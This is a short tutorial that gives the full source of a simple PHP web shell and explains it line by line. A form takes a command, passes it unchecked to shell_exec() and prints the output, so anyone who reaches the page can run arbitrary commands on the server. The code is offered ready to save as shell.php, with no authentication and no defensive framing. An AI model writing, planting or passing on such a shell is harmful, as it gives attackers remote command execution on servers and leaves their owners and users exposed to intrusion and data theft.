Here is a simple PHP shell script which took less than 10 minutes to write. This tiny script lets you execute arbitrary shell commands or browse the filesystem on a remote Linux server.
<HTML>
<HEAD>
<TITLE>Simple PHP Shell</TITLE>
</HEAD>
<BODY>
<form action=”shell.php” method=post>
<input type=”text” NAME=”c”/>
<input name=”submit” type=submit value=”Command”>
</FORM>
<?php
if(isset($_REQUEST[‘submit’]))
{
$c = $_REQUEST[‘c’];
$output = shell_exec(“$c”);
echo “<pre>$output</pre>\n”;
}
?>
</BODY>
</HTML>
The script has two parts: HTML and PHP
HMTL
1. This is the start of HTML code.
<HTML>
2. Create a HEAD section for the HTML page and declare “Simple PHP Shell” as its title.
<HEAD>
<TITLE>Simple PHP Shell</TITLE>
</HEAD>
3. Create BODY section for the HTML page.
<BODY>
4. Create a form which calls shell.php. Please note, this assumes that this script is saved as shell.php.
<form action=”shell.php” method=post>
5. Create a text input field with the name of “c”.
<input type=”text” NAME=”c”/>
6. Create a button with the name of “submit” with the label “Command”
<input type=submit name=”submit” value=”Command”>
7. Close the form.
</FORM>
PHP
1. The PHP code is embedded in the HTML code and the start is marked by
<?php
2. Check if the form has been submitted. If the URL variable ‘submit’ exists then the user has clicked the “Command” button. If not do nothing.
if(isset($_REQUEST[‘submit’]))
3. Declare “$c” as a variable and set it to the contents of the input field ‘c’ from the HTML form.
$c = $_REQUEST[‘c’];
4. Declare “$output” as a variable to hold the return value from the shell_exec() function. “$c” is the command that the user entered in the input field.
$output = shell_exec(“$c”);
5. Show the result.
echo “<pre>$output</pre>\n”;
6. Declare the end for the PHP code.
?>
Closing the HTML
1. Close the BODY section.
</BODY>
2. Declare the end for the HTML code.
</HTML>